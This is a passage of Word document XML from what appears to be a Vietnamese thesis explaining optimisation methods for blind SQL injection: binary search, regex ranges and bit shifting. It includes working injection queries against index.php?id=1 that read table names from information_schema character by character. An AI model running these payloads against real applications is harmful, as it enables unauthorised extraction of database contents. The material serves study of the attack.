    <w:p w:rsidR="00843C00" w:rsidRPr="005D3C52" w:rsidRDefault="00843C00" w:rsidP="00843C00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="58" w:name="_Toc458409283"/>
      <w:bookmarkStart w:id="59" w:name="_Toc458409353"/>
      <w:bookmarkStart w:id="60" w:name="_Toc458433479"/>
      <w:bookmarkStart w:id="61" w:name="_Toc459373896"/>
      <w:bookmarkStart w:id="62" w:name="_Toc459373956"/>
      <w:bookmarkStart w:id="63" w:name="_Toc459374329"/>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
      <w:bookmarkEnd w:id="60"/>
      <w:bookmarkEnd w:id="61"/>
      <w:bookmarkEnd w:id="62"/>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w:rsidR="00843C00" w:rsidRPr="005D3C52" w:rsidRDefault="00843C00" w:rsidP="00843C00">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:contextualSpacing w:val="0"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:vanish/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc458409284"/>
      <w:bookmarkStart w:id="65" w:name="_Toc458409354"/>
      <w:bookmarkStart w:id="66" w:name="_Toc458433480"/>
      <w:bookmarkStart w:id="67" w:name="_Toc459373897"/>
      <w:bookmarkStart w:id="68" w:name="_Toc459373957"/>
      <w:bookmarkStart w:id="69" w:name="_Toc459374330"/>
      <w:bookmarkEnd w:id="64"/>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
      <w:bookmarkEnd w:id="69"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00843C00">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc459374331"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tối ưu hóa sử dụng thuật toán tìm kiếm nhị phân</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Phương pháp này dựa trên thuật toán tìm kiếm nhị phân (Binary Search). Trong khoa học máy tính, thuật toán tìm kiếm nhị phân là một thuật toán dùng để tìm kiếm phần tử trong một danh sách đã được sắp xếp. Thuật toán hoạt động như sau: Trong mỗi bước, so sánh phần tử cần tìm với phần tử nằm ở chính giữa danh sách. Nếu hai phần tử bằng nhau thì phép tìm kiếm thành công và thuật toán kết thúc. Nếu chúng không bằng nhau thì tùy vào phần tử nào lớn hơn, thuật toán lặp lại bước so sánh trên với nửa đầu hoặc nửa sau của danh sách. Vì số lượng phần tử trong danh sách cần xem xét giảm đi một nửa sau mỗi bước, nên thời gian thực thi của thuật toán là hàm lôgarit. Sau mỗi phép so sánh, số lượng phần tử trong danh sách cần xét giảm đi một nửa. Thuật toán kết thúc khi số lượng phần tử còn không quá 1. Vì vậy thời gian thực thi của thuật toán là </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
        </w:rPr>
        <w:t>O(logn)</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="252525"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Có thể thấy rằng, </w:t>
      </w:r>
      <w:r w:rsidR="004601D9">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> đang đi tìm giá trị của chữ cái trong tập danh sách các ký tự đã biết. Các ký tự này có thể sắp xếp, bằng cách chuyển đổi về giá trị trong bảng mã ASCII. Với khoảng 128 ký tự, trong đó có 94 ký tự dạng nhìn thấy được ( 2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&lt; 94 &lt; 2</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>), sau khi áp dụng phương pháp tìm kiếm nhị phân, chỉ cần khoảng 7 yêu cầu là có thể l</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ấy được 1 ký tự. Tuy nhiên, phương pháp này có nhược điểm là phải thực hiện tuần tự 7 yêu cầu, vì kết quả yêu cầu trước sẽ quyết định nội dung của yêu cầu tiếp theo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F69FA" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="004F69FA">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B4071B5" wp14:editId="2257167B">
            <wp:extent cx="3060065" cy="181356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9"/>
                    <a:srcRect l="555" t="1359" r="989" b="1712"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3060065" cy="181356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71" w:name="_Toc458436424"/>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12</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Thuật toán tìm kiếm nhị phân</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00843C00">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc459374332"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tối ưu hóa sử dụng Regex</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Được giới thiệu lần đầu tiên trong bài báo “Blind Sql Injection with Regular Expressions Attack” của Simone Quatrini và Marco Rondini, phương pháp này là một biến thể của phương pháp dựa trên tìm kiếm nhị phân ở trên, bằng cách sử dụng các biểu thức chính quy (regular expressions). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong ví dụ sau, </w:t>
      </w:r>
      <w:r w:rsidR="00BE2A5E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">luận văn sẽ trình bày </w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>trích xuất lấy bản ghi đầu tiên trong bảng information_schema.tables. Với yêu cầu đầu tiên:</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12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rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables LIMIT 0,1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Yêu cầu này dùng để kiểm tra có mắc lỗi Blind SQL injection hay không. Nếu trang trả về hợp lệ, thì có nghĩa là ứng dụng mắc lỗi (vì 1=1). Trong trường hợp này, bản ghi sẽ được bắt đầu bằng ký tự trong khoảng a-z, phương pháp sau sẽ cho thấy làm thế nào để trích xuất được:</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12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BB59F4" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^[</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>a-n</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">]' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">True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a-g</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">]' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">False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h-n</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">]' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">True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h-l</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">]' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">False </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BB59F4" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SC</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:lastRenderedPageBreak/>
              <w:t>HEMA="blind_sqli" AND table_name REGEXP '^</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">False </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:t>index.php?id=1 and 1=(SELECT 1 FROM information_schema.tables WHERE TABLE_SCHEMA="blind_sqli" AND table_name REGEXP '^</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>n</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:t xml:space="preserve">' LIMIT 0,1) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00876FFE">
            <w:pPr>
              <w:pStyle w:val="CodeInBox"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Như vậy ký tự đầu tiên là “n”. Phương pháp này là một biến thể của tìm kiếm nhị phân ở trên, thay vì sử dụng so sánh dạng mã ASCII thì phương pháp sử dụng các điều kiện của biểu thức chính quy. Nếu nằm trong khoảng giới hạn của biểu thức sẽ trả về True, nếu không sẽ trả về False. Sau mỗi lần yêu cầu, khoảng giới hạn lại được thu hẹp một nửaa.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Đối với hệ quản trị MyS</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Q</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>L sẽ sử dụng hàm REGEXP, còn hệ quản trị MSSQL Server, sử dụng mệnh đề LIKE có chức năng tương tự. Một trong những vấn đề của phương pháp này đó là, việc sử dụng biểu thức chính quy trong mỗi hệ quản trị cơ sở dữ liệu là khác nhau, dẫn đến tương ứng từng loại cơ sở dữ liệu phải xây dựng mã tấn công riêng biệt, không thể dùng chung cho nhiều hệ quản trị cơ sở dữ liệu. Phương pháp này cũng giống như phương pháp tìm kiếm nhị phân ở trên, không thể thực hiện được song song mà phải thực hiện tuần tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00843C00">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc459374333"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Tối ưu hóa sử dụng phương pháp dịch bit</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Phương pháp thứ hai sử dụng kỹ thuật dịch bit (Bit Shifing). Mỗi ký tự đều tương ứng với một giá trị trong bảng mã ASCII. Giá trị này từ 0 đến 127 đối với hệ cơ số thập phân, nếu chuyển sang hệ nhị phân thì giá trị này sẽ được biểu diễn bằng 7 bit. Ví dụ sau đây, ký tự “a” có mã ASCII là 97, mã nhị phân sẽ là: 01100001. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9405"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2519"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="2610"/>
        <w:gridCol w:w="2476"/>
      </w:tblGrid>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="00BB59F4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2519"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Mã nhị phân của “a”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800"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Số bit được dịch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610"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nhị phân</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="247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thập phân</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b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">1100001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7</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r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">100001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6</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1</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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">00001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5</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4667B">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pP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4667B">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pP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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">0001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4</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0000011</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6</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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">001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3</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0000110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12</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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">01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2</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0001100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24</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w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">1 </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1</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0011000</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>0</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 xml:space="preserve">48 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidTr="00BB59F4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="251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0110000</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="180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0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2610"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0110000</w:t>
            </w:r>
            <w:r w:rsidRPr="005D3C52">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2476"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97</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Lần lượt dịch bit, từ đó trích xuất ra được bit cần thiết của ký tự. Bit cần lấy chính là bit cuối cùng trong kết quả dạng nhị phân. Cần xác định bit này là 0, hay là 1. Thông thường, cá</w:t>
      </w:r>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ch đơn giản nhất là chuyển kết quả sang dạng thập phân, rồi đem chia lấy phần dư cho 2. Nếu dư 1 thì bit đó là 1, dư 0 thì bit đó là 0</w:t>
      </w:r>
      <w:r w:rsidR="00BB59F4" w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sử dụng kỹ thuật dịch bit cho phép lấy ra giá trị từng bit của ký tự. Với mỗi ký tự lúc này chỉ là 0 hoặc 1, nên chỉ cần 1 yêu cầu để xác định bit đó (Có phải 1 không ? Nếu không thì sẽ là 0). Với 7 bit sẽ cần 7 yêu cầu để xác định đúng chính xác ký tự.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>So với phương pháp tìm kiếm nhị phân, phương pháp dịch bit có ưu điểm cho phép thực hiện 7 yêu cầu không cần tuần tự, có thể thực hiện không song song, độc lập với nhau. Tuy nhiên, nhược điểm là luôn cần 7 yêu cầu để lấy được một ký tự. Trong khi đối với các phương pháp dạng tìm kiếm, một số trường hợp có thể ít hơn 7 yêu cầu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098" w:rsidP="00843C00">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc459374334"/>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Phương pháp tối ưu bằng cách dùng Bin2Pos</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w:rsidR="0034667B" w:rsidRPr="005D3C52" w:rsidRDefault="003F7098">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D3C52">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
